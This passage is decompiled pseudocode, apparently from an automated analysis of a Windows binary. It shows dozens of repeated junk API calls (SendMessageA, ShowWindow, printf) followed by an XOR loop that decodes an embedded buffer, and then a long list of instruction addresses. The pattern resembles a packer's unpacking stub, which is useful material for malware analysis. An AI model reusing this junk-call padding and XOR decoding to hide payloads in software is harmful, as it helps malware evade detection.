						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1177 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1178 = _t1177 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1178 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1179 = _t1178 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1179 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1180 = _t1179 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1180 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1181 = _t1180 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1181 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1182 = _t1181 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1182 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1183 = _t1182 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1183 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1184 = _t1183 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1184 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1185 = _t1184 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1185 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1186 = _t1185 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1186 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1187 = _t1186 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1187 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1188 = _t1187 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1188 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1189 = _t1188 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1189 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1190 = _t1189 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1190 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1191 = _t1190 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1191 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1192 = _t1191 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1192 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1193 = _t1192 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1193 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1194 = _t1193 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1194 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1195 = _t1194 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1195 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1196 = _t1195 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1196 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1197 = _t1196 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1197 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1198 = _t1197 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1198 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1199 = _t1198 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1199 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1200 = _t1199 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1200 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1201 = _t1200 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1201 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1202 = _t1201 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1202 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1203 = _t1202 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1203 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1204 = _t1203 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1204 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1205 = _t1204 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1205 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1206 = _t1205 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1206 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1207 = _t1206 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1207 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1208 = _t1207 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1208 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1209 = _t1208 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1209 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1210 = _t1209 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1210 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1211 = _t1210 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1211 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1212 = _t1211 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1212 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1213 = _t1212 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1213 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1214 = _t1213 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1214 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1215 = _t1214 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1215 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t944 = _t1215 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						asm("cdq");
						_t902 =  *(_t944 + 0x20);
						 *_t902 =  *_t902 ^  *(_t944 + (( *(_t944 +  *(_t944 + 0x14) + 0x24) & 0x000000ff) + ( *(_t944 + 0x13) & 0x000000ff)) % 0x127aa + 0x24);
						_t63 = _t944 + 0x1c;
						 *_t63 =  *((intOrPtr*)(_t944 + 0x1c)) - 1;
						 *(_t944 + 0x20) =  &(_t902[0]);
						if( *_t63 == 0) {
							break;
						}
						_t78 =  *(_t944 + 0x14);
					}
					_t69 =  *(_t944 + 0x127dc);
				}
				return _t69;
			}

0x00403646
0x00403655
0x00405c70
0x0040365b
0x0040365b
0x0040365d
0x0040365d
0x00403661
0x00403662
0x0040366c
0x0040366e
0x00403670
0x00403682
0x00403686
0x00403695
0x0040369e
0x004036a5
0x004036ab
0x004036b1
0x004036b1
0x004036d5
0x004036d8
0x004036dd
0x004036e1
0x004036eb
0x004036f3
0x004036fb
0x004036ff
0x0040370a
0x00403710
0x00403716
0x00403722
0x00403726
0x0040372a
0x0040372b
0x0040372c
0x0040372e
0x00403736
0x00403738
0x00403743
0x00403747
0x0040374f
0x00403750
0x00403751
0x00403759
0x0040375b
0x00403766
0x0040376a
0x00403772
0x00403773
0x00403774
0x0040377c
0x0040377e
0x00403789
0x0040378d
0x00403795
0x00403796
0x00403797
0x0040379f
0x004037a1
0x004037ac
0x004037b0
0x004037b8
0x004037b9
0x004037ba
0x004037c2
0x004037c4
0x004037cf
0x004037d3
0x004037db
0x004037dc
0x004037dd
0x004037e5
0x004037e7
0x004037f2
0x004037f6
0x004037fe
0x004037ff
0x00403800
0x00403808
0x0040380a
0x00403815
0x00403819
0x00403821
0x00403822
0x00403823
0x0040382b
0x0040382d
0x00403838
0x0040383c
0x00403844
0x00403845
0x00403846
0x0040384e
0x00403850
0x0040385b
0x0040385f
0x00403867
0x00403868
0x00403869
0x00403871
0x00403873
0x0040387e
0x00403882
0x0040388a
0x0040388b
0x0040388c
0x00403894
0x00403896
0x004038a1
0x004038a5
0x004038ad
0x004038ae
0x004038af
0x004038b7
0x004038b9
0x004038c4
0x004038c8
0x004038d0
0x004038d1
0x004038d2
0x004038da
0x004038dc
0x004038e7
0x004038eb
0x004038f3
0x004038f4
0x004038f5
0x004038fd
0x004038ff
0x0040390a
0x0040390e
0x00403916
0x00403917
0x00403918
0x00403920
0x00403922
0x0040392d
0x00403931
0x00403939
0x0040393a
0x0040393b
0x00403943
0x00403945
0x00403950
0x00403954
0x0040395c
0x0040395d
0x0040395e
0x00403966
0x00403968
0x00403973
0x00403977
0x0040397f
0x00403980
0x00403981
0x00403989
0x0040398b
0x00403996
0x0040399a
0x004039a2
0x004039a3
0x004039a4
0x004039ac
0x004039ae
0x004039b9
0x004039bd
0x004039c5
0x004039c6
0x004039c7
0x004039cf
0x004039d1
0x004039dc
0x004039e0
0x004039e8
0x004039e9
0x004039ea
0x004039f2
0x004039f4
0x004039ff
0x00403a03
0x00403a0b
0x00403a0c
0x00403a0d
0x00403a15
0x00403a17
0x00403a22
0x00403a26
0x00403a2e
0x00403a2f
0x00403a30
0x00403a38
0x00403a3a
0x00403a45
0x00403a49
0x00403a51
0x00403a52
0x00403a53
0x00403a5b
0x00403a5d
0x00403a68
0x00403a6c
0x00403a74
0x00403a75
0x00403a76
0x00403a7e
0x00403a80
0x00403a8b
0x00403a8f
0x00403a97
0x00403a98
0x00403a99
0x00403aa1
0x00403aa3
0x00403aae
0x00403ab2
0x00403aba
0x00403abb
0x00403abc
0x00403ac4
0x00403ac6
0x00403ad1
0x00403ad5
0x00403add
0x00403ade
0x00403adf
0x00403ae7
0x00403ae9
0x00403af4
0x00403af8
0x00403b00
0x00403b01
0x00403b02
0x00403b0a
0x00403b0c
0x00403b17
0x00403b1b
0x00403b23
0x00403b24
0x00403b25
0x00403b2d
0x00403b2f
0x00403b3a
0x00403b3e
0x00403b46
0x00403b47
0x00403b48
0x00403b50
0x00403b52
0x00403b5d
0x00403b61
0x00403b69
0x00403b6a
0x00403b6b
0x00403b73
0x00403b75
0x00403b80
0x00403b84
0x00403b8c
0x00403b8d
0x00403b8e
0x00403b96
0x00403b98
0x00403ba3
0x00403ba7
0x00403baf
0x00403bb0
0x00403bb1
0x00403bb9
0x00403bbb
0x00403bc6
0x00403bca
0x00403bd2
0x00403bd3
0x00403bd4
0x00403bdc
0x00403bde
0x00403be9
0x00403bed
0x00403bf5
0x00403bf6
0x00403bf7
0x00403bff
0x00403c01
0x00403c0c
0x00403c10
0x00403c18
0x00403c19
0x00403c1a
0x00403c22
0x00403c24
0x00403c2f
0x00403c33
0x00403c3b
0x00403c3c
0x00403c3d
0x00403c45
0x00403c47
0x00403c52
0x00403c56
0x00403c5e
0x00403c5f
0x00403c60
0x00403c68
0x00403c6a
0x00403c75
0x00403c79
0x00403c81
0x00403c82
0x00403c83
0x00403c8b
0x00403c8d
0x00403c98
0x00403c9c
0x00403ca4
0x00403ca5
0x00403ca6
0x00403cae
0x00403cb0
0x00403cbb
0x00403cbf
0x00403cc7
0x00403cc8
0x00403cc9
0x00403cd1
0x00403cd3
0x00403cde
0x00403ce2
0x00403cea
0x00403ceb
0x00403cec
0x00403cf4
0x00403cf6
0x00403d01
0x00403d05
0x00403d0d
0x00403d0e
0x00403d0f
0x00403d17
0x00403d19
0x00403d24
0x00403d28
0x00403d30
0x00403d31
0x00403d32
0x00403d3a
0x00403d3c
0x00403d47
0x00403d4b
0x00403d53
0x00403d54
0x00403d55
0x00403d5d
0x00403d5f
0x00403d6a
0x00403d6e
0x00403d76
0x00403d77
0x00403d78
0x00403d80
0x00403d82
0x00403d8d
0x00403d91
0x00403d99
0x00403d9a
0x00403d9b
0x00403da3
0x00403da5
0x00403db0
0x00403db4
0x00403dbc
0x00403dbd
0x00403dbe
0x00403dc6
0x00403dc8
0x00403dd3
0x00403dd7
0x00403ddf
0x00403de0
0x00403de1
0x00403de9
0x00403deb
0x00403df6
0x00403dfa
0x00403e02
0x00403e03
0x00403e04
0x00403e0c
0x00403e0e
0x00403e19
0x00403e1d
0x00403e25
0x00403e26
0x00403e27
0x00403e2f
0x00403e31
0x00403e3c
0x00403e40
0x00403e48
0x00403e49
0x00403e4a
0x00403e52
0x00403e54
0x00403e5f
0x00403e63
0x00403e6b
0x00403e6c
0x00403e6d
0x00403e75
0x00403e77
0x00403e82
0x00403e86
0x00403e8e
0x00403e8f
0x00403e90
0x00403e98
0x00403e9a
0x00403ea5
0x00403ea9
0x00403eb1
0x00403eb2
0x00403eb3
0x00403ebb
0x00403ebd
0x00403ec8
0x00403ecc
0x00403ed4
0x00403ed5
0x00403ed6
0x00403ede
0x00403ee0
0x00403eeb
0x00403eef
0x00403ef7
0x00403ef8
0x00403ef9
0x00403f01
0x00403f03
0x00403f0e
0x00403f12
0x00403f1a
0x00403f1b
0x00403f1c
0x00403f24
0x00403f26
0x00403f31
0x00403f35
0x00403f3d
0x00403f3e
0x00403f3f
0x00403f47
0x00403f49
0x00403f54
0x00403f58
0x00403f60
0x00403f61
0x00403f62
0x00403f6a
0x00403f6c
0x00403f77
0x00403f7b
0x00403f83
0x00403f84
0x00403f85
0x00403f8d
0x00403f8f
0x00403f9a
0x00403f9e
0x00403fa6
0x00403fa7
0x00403fa8
0x00403fb0
0x00403fb2
0x00403fbd
0x00403fc1
0x00403fc9
0x00403fca
0x00403fcb
0x00403fd3
0x00403fd5
0x00403fe0
0x00403fe4
0x00403fec
0x00403fed
0x00403fee
0x00403ff6
0x00403ff8
0x00404003
0x00404007
0x0040400f
0x00404010
0x00404011
0x00404019
0x0040401b
0x00404026
0x0040402a
0x00404032
0x00404033
0x00404034
0x0040403c
0x0040403e
0x00404049
0x0040404d
0x00404055
0x00404056
0x00404057
0x0040405f
0x00404061
0x0040406c
0x00404070
0x00404078
0x00404079
0x0040407a
0x00404082
0x00404084
0x0040408f
0x00404093
0x0040409b
0x0040409c
0x0040409d
0x004040a5
0x004040a7
0x004040b2
0x004040b6
0x004040be
0x004040bf
0x004040c0
0x004040c8
0x004040ca
0x004040d5
0x004040d9
0x004040e1
0x004040e2
0x004040e3
0x004040eb
0x004040ed
0x004040f8
0x004040fc
0x00404104
0x00404105
0x00404106
0x0040410e
0x00404110
0x0040411b
0x0040411f
0x00404127
0x00404128
0x00404129
0x00404131
0x00404133
0x0040413e
0x00404142
0x0040414a
0x0040414b
0x0040414c
0x00404154
0x00404156
0x00404161
0x00404165
0x0040416d
0x0040416e
0x0040416f
0x00404177
0x00404179
0x00404184
0x00404188
0x00404190
0x00404191
0x00404192
0x0040419a
0x0040419c
0x004041a7
0x004041ab
0x004041b3
0x004041b4
0x004041b5
0x004041bd
0x004041bf
0x004041ca
0x004041ce
0x004041d6
0x004041d7
0x004041d8
0x004041e0
0x004041e2
0x004041ed
0x004041f1
0x004041f9
0x004041fa
0x004041fb
0x00404203
0x00404205
0x00404210
0x00404214
0x0040421c
0x0040421d
0x0040421e
0x00404226
0x00404228
0x00404233
0x00404237
0x0040423f
0x00404240
0x00404241
0x00404249
0x0040424b
0x00404256
0x0040425a
0x00404262
0x00404263
0x00404264
0x0040426c
0x0040426e
0x00404279
0x0040427d
0x00404285
0x00404286
0x00404287
0x0040428f
0x00404291
0x0040429c
0x004042a0
0x004042a8
0x004042a9
0x004042aa
0x004042b2
0x004042b4
0x004042bf
0x004042c3
0x004042cb
0x004042cc
0x004042cd
0x004042d5
0x004042d7
0x004042e2
0x004042e6
0x004042ee
0x004042ef
0x004042f0
0x004042f8
0x004042fa
0x00404305
0x00404309
0x00404311
0x00404312
0x00404313
0x0040431b
0x0040431d
0x00404328
0x0040432c
0x00404334
0x00404335
0x00404336
0x0040433e
0x00404340
0x0040434b
0x0040434f
0x00404357
0x00404358
0x00404359
0x00404361
0x00404363
0x0040436e
0x00404372
0x0040437a
0x0040437b
0x0040437c
0x00404384
0x00404386
0x00404391
0x00404395
0x0040439d
0x0040439e
0x0040439f
0x004043a7
0x004043a9
0x004043b4
0x004043b8
0x004043c0
0x004043c1
0x004043c2
0x004043ca
0x004043cc
0x004043d7
0x004043db
0x004043e3
0x004043e4
0x004043e5
0x004043ed
0x004043ef
0x004043fa
0x004043fe
0x00404406
0x00404407
0x00404408
0x00404410
0x00404412
0x0040441d
0x00404421
0x00404429
0x0040442a
0x0040442b
0x00404433
0x00404435
0x00404440
0x00404444
0x0040444c
0x0040444d
0x0040444e
0x00404456
0x00404458
0x00404463
0x00404467
0x0040446f
0x00404470
0x00404471
0x00404479
0x0040447b
0x00404486
0x0040448a
0x00404492
0x00404493
0x00404494
0x0040449c
0x0040449e
0x004044a9
0x004044ad
0x004044b5
0x004044b6
0x004044b7
0x004044bf
0x004044c1
0x004044cc
0x004044d0
0x004044d8
0x004044d9
0x004044da
0x004044e2
0x004044e4
0x004044ef
0x004044f3
0x004044fb
0x004044fc
0x004044fd
0x00404505
0x00404507
0x00404512
0x00404516
0x0040451e
0x0040451f
0x00404520
0x00404528
0x0040452a
0x00404535
0x00404539
0x00404541
0x00404542
0x00404543
0x0040454b
0x0040454d
0x00404558
0x0040455c
0x00404564
0x00404565
0x00404566
0x0040456e
0x00404570
0x0040457b
0x0040457f
0x00404587
0x00404588
0x00404589
0x00404591
0x00404593
0x0040459e
0x004045a2
0x004045aa
0x004045ab
0x004045ac
0x004045b4
0x004045b6
0x004045c1
0x004045c5
0x004045cd
0x004045ce
0x004045cf
0x004045d7
0x004045d9
0x004045e4
0x004045e8
0x004045f0
0x004045f1
0x004045f2
0x004045fa
0x004045fc
0x00404607
0x0040460b
0x00404613
0x00404614
0x00404615
0x0040461d
0x0040461f
0x0040462a
0x0040462e
0x00404636
0x00404637
0x00404638
0x00404640
0x00404642
0x0040464d
0x00404651
0x00404659
0x0040465a
0x0040465b
0x00404663
0x00404665
0x00404670
0x00404674
0x0040467c
0x0040467d
0x0040467e
0x00404686
0x00404688
0x00404693
0x00404697
0x0040469f
0x004046a0
0x004046a1
0x004046a9
0x004046ab
0x004046b6
0x004046ba
0x004046c2
0x004046c3
0x004046c4
0x004046cc
0x004046ce
0x004046d9
0x004046dd
0x004046e5
0x004046e6
0x004046e7
0x004046ef
0x004046f1
0x004046fc
0x00404700
0x00404708
0x00404709
0x0040470a
0x00404712
0x00404714
0x0040471f
0x00404723
0x0040472b
0x0040472c
0x0040472d
0x00404735
0x00404737
0x00404742
0x00404746
0x0040474e
0x0040474f
0x00404750
0x00404758
0x0040475a
0x00404765
0x00404769
0x00404771
0x00404772
0x00404773
0x0040477b
0x0040477d
0x00404788
0x0040478c
0x00404794
0x00404795
0x00404796
0x0040479e
0x004047a0
0x004047ab
0x004047af
0x004047b7
0x004047b8
0x004047b9
0x004047c1
0x004047c3
0x004047ce
0x004047d2
0x004047da
0x004047db
0x004047dc
0x004047e4
0x004047e6
0x004047f1
0x004047f5
0x004047fd
0x004047fe
0x004047ff
0x00404807
0x00404809
0x00404814
0x00404818
0x00404820
0x00404821
0x00404822
0x0040482a
0x0040482c
0x00404837
0x0040483b
0x00404843
0x00404844
0x00404845
0x0040484d
0x0040484f
0x0040485a
0x0040485e
0x00404866
0x00404867
0x00404868
0x00404870
0x00404872
0x0040487d
0x00404881
0x00404889
0x0040488a
0x0040488b
0x00404893
0x00404895
0x004048a0
0x004048a4
0x004048ac
0x004048ad
0x004048ae
0x004048b6
0x004048b8
0x004048c3
0x004048c7
0x004048cf
0x004048d0
0x004048d1
0x004048d9
0x004048db
0x004048e6
0x004048ea
0x004048f2
0x004048f3
0x004048f4
0x004048fc
0x004048fe
0x00404909
0x0040490d
0x00404915
0x00404916
0x00404917
0x0040491f
0x00404921
0x0040492c
0x00404930
0x00404938
0x00404939
0x0040493a
0x00404942
0x00404944
0x0040494f
0x00404953
0x0040495b
0x0040495c
0x0040495d
0x00404965
0x00404967
0x00404972
0x00404976
0x0040497e
0x0040497f
0x00404980
0x00404988
0x0040498a
0x00404995
0x00404999
0x004049a1
0x004049a2
0x004049a3
0x004049ab
0x004049ad
0x004049b8
0x004049bc
0x004049c4
0x004049c5
0x004049c6
0x004049ce
0x004049d0
0x004049db
0x004049df
0x004049e7
0x004049e8
0x004049e9
0x004049f1
0x004049f3
0x004049fe
0x00404a02
0x00404a0a
0x00404a0b
0x00404a0c
0x00404a14
0x00404a16
0x00404a21
0x00404a25
0x00404a2d
0x00404a2e
0x00404a2f
0x00404a37
0x00404a39
0x00404a44
0x00404a48
0x00404a50
0x00404a51
0x00404a52
0x00404a5a
0x00404a5c
0x00404a67
0x00404a6b
0x00404a73
0x00404a74
0x00404a75
0x00404a7d
0x00404a7f
0x00404a8a
0x00404a8e
0x00404a96
0x00404a97
0x00404a98
0x00404aa0
0x00404aa2
0x00404aad
0x00404ab1
0x00404ab9
0x00404aba
0x00404abb
0x00404ac3
0x00404ac5
0x00404ad0
0x00404ad4
0x00404adc
0x00404add
0x00404ade
0x00404ae6
0x00404ae8
0x00404af3
0x00404af7
0x00404aff
0x00404b00
0x00404b01
0x00404b09
0x00404b0b
0x00404b16
0x00404b1a
0x00404b22
0x00404b23
0x00404b24
0x00404b2c
0x00404b2e
0x00404b39
0x00404b3d
0x00404b45
0x00404b46
0x00404b47
0x00404b4f
0x00404b51
0x00404b5c
0x00404b60
0x00404b68
0x00404b69
0x00404b6a
0x00404b72
0x00404b74
0x00404b7f
0x00404b83
0x00404b8b
0x00404b8c
0x00404b8d
0x00404b95
0x00404b97
0x00404ba2
0x00404ba6
0x00404bae
0x00404baf
0x00404bb0
0x00404bb8
0x00404bba
0x00404bc5
0x00404bc9
0x00404bd1
0x00404bd2
0x00404bd3
0x00404bdb
0x00404bdd
0x00404be8
0x00404bec
0x00404bf4
0x00404bf5
0x00404bf6
0x00404bfe
0x00404c00
0x00404c0b
0x00404c0f
0x00404c17
0x00404c18
0x00404c19
0x00404c21
0x00404c23
0x00404c2e
0x00404c32
0x00404c3a
0x00404c3b
0x00404c3c
0x00404c44
0x00404c46
0x00404c51
0x00404c55
0x00404c5d
0x00404c5e
0x00404c5f
0x00404c67
0x00404c69
0x00404c74
0x00404c78
0x00404c80
0x00404c81
0x00404c82
0x00404c8a
0x00404c8c
0x00404c97
0x00404c9b
0x00404ca3
0x00404ca4
0x00404ca5
0x00404cad
0x00404caf
0x00404cba
0x00404cbe
0x00404cc6
0x00404cc7
0x00404cc8
0x00404cd0
0x00404cd2
0x00404cdd
0x00404ce1
0x00404ce9
0x00404cea
0x00404ceb
0x00404cf3
0x00404cf5
0x00404d00
0x00404d04
0x00404d0c
0x00404d0d
0x00404d0e
0x00404d16
0x00404d18
0x00404d23
0x00404d27
0x00404d2f
0x00404d30
0x00404d31
0x00404d39
0x00404d3b
0x00404d46
0x00404d4a
0x00404d52
0x00404d53
0x00404d54
0x00404d5c
0x00404d5e
0x00404d69
0x00404d6d
0x00404d75
0x00404d76
0x00404d77
0x00404d7f
0x00404d81
0x00404d8c
0x00404d90
0x00404d98
0x00404d99
0x00404d9a
0x00404da2
0x00404da4
0x00404daf
0x00404db3
0x00404dbb
0x00404dbc
0x00404dbd
0x00404dc5
0x00404dc7
0x00404dd2
0x00404dd6
0x00404dde
0x00404ddf
0x00404de0
0x00404de8
0x00404dea
0x00404df5
0x00404df9
0x00404e01
0x00404e02
0x00404e03
0x00404e0b
0x00404e0d
0x00404e18
0x00404e1c
0x00404e24
0x00404e25
0x00404e26
0x00404e2e
0x00404e30
0x00404e3b
0x00404e3f
0x00404e47
0x00404e48
0x00404e49
0x00404e51
0x00404e53
0x00404e5e
0x00404e62
0x00404e6a
0x00404e6b
0x00404e6c
0x00404e74
0x00404e76
0x00404e81
0x00404e85
0x00404e8d
0x00404e8e
0x00404e8f
0x00404e97
0x00404e99
0x00404ea4
0x00404ea8
0x00404eb0
0x00404eb1
0x00404eb2
0x00404eba
0x00404ebc
0x00404ec7
0x00404ecb
0x00404ed3
0x00404ed4
0x00404ed5
0x00404edd
0x00404edf
0x00404eea
0x00404eee
0x00404ef6
0x00404ef7
0x00404ef8
0x00404f00
0x00404f02
0x00404f0d
0x00404f11
0x00404f19
0x00404f1a
0x00404f1b
0x00404f23
0x00404f25
0x00404f30
0x00404f34
0x00404f3c
0x00404f3d
0x00404f3e
0x00404f46
0x00404f48
0x00404f53
0x00404f57
0x00404f5f
0x00404f60
0x00404f61
0x00404f69
0x00404f6b
0x00404f76
0x00404f7a
0x00404f82
0x00404f83
0x00404f84
0x00404f8c
0x00404f8e
0x00404f99
0x00404f9d
0x00404fa5
0x00404fa6
0x00404fa7
0x00404faf
0x00404fb1
0x00404fbc
0x00404fc0
0x00404fc8
0x00404fc9
0x00404fca
0x00404fd2
0x00404fd4
0x00404fdf
0x00404fe3
0x00404feb
0x00404fec
0x00404fed
0x00404ff5
0x00404ff7
0x00405002
0x00405006
0x0040500e
0x0040500f
0x00405010
0x00405018
0x0040501a
0x00405025
0x00405029
0x00405031
0x00405032
0x00405033
0x0040503b
0x0040503d
0x00405048
0x0040504c
0x00405054
0x00405055
0x00405056
0x0040505e
0x00405060
0x0040506b
0x0040506f
0x00405077
0x00405078
0x00405079
0x00405081
0x00405083
0x0040508e
0x00405092
0x0040509a
0x0040509b
0x0040509c
0x004050a4
0x004050a6
0x004050b1
0x004050b5
0x004050bd
0x004050be
0x004050bf
0x004050c7
0x004050c9
0x004050d4
0x004050d8
0x004050e0
0x004050e1
0x004050e2
0x004050ea
0x004050ec
0x004050f7
0x004050fb
0x00405103
0x00405104
0x00405105
0x0040510d
0x0040510f
0x0040511a
0x0040511e
0x00405126
0x00405127
0x00405128
0x00405130
0x00405132
0x0040513d
0x00405141
0x00405149
0x0040514a
0x0040514b
0x00405153
0x00405155
0x00405160
0x00405164
0x0040516c
0x0040516d
0x0040516e
0x00405176
0x00405178
0x00405183
0x00405187
0x0040518f
0x00405190
0x00405191
0x00405199
0x0040519b
0x004051a6
0x004051aa
0x004051b2
0x004051b3
0x004051b4
0x004051bc
0x004051be
0x004051c9
0x004051cd
0x004051d5
0x004051d6
0x004051d7
0x004051df
0x004051e1
0x004051ec
0x004051f0
0x004051f8
0x004051f9
0x004051fa
0x00405202
0x00405204
0x0040520f
0x00405213
0x0040521b
0x0040521c
0x0040521d
0x00405225
0x00405227
0x00405232
0x00405236
0x0040523e
0x0040523f
0x00405240
0x00405248
0x0040524a
0x00405255
0x00405259
0x00405261
0x00405262
0x00405263
0x0040526b
0x0040526d
0x00405278
0x0040527c
0x00405284
0x00405285
0x00405286
0x0040528e
0x00405290
0x0040529b
0x0040529f
0x004052a7
0x004052a8
0x004052a9
0x004052b1
0x004052b3
0x004052be
0x004052c2
0x004052ca
0x004052cb
0x004052cc
0x004052d4
0x004052d6
0x004052e1
0x004052e5
0x004052ed
0x004052ee
0x004052ef
0x004052f7
0x004052f9
0x00405304
0x00405308
0x00405310
0x00405311
0x00405312
0x0040531a
0x0040531c
0x00405327
0x0040532b
0x00405333
0x00405334
0x00405335
0x0040533d
0x0040533f
0x0040534a
0x0040534e
0x00405356
0x00405357
0x00405358
0x00405360
0x00405362
0x0040536d
0x00405371
0x00405379
0x0040537a
0x0040537b
0x00405383
0x00405385
0x00405390
0x00405394
0x0040539c
0x0040539d
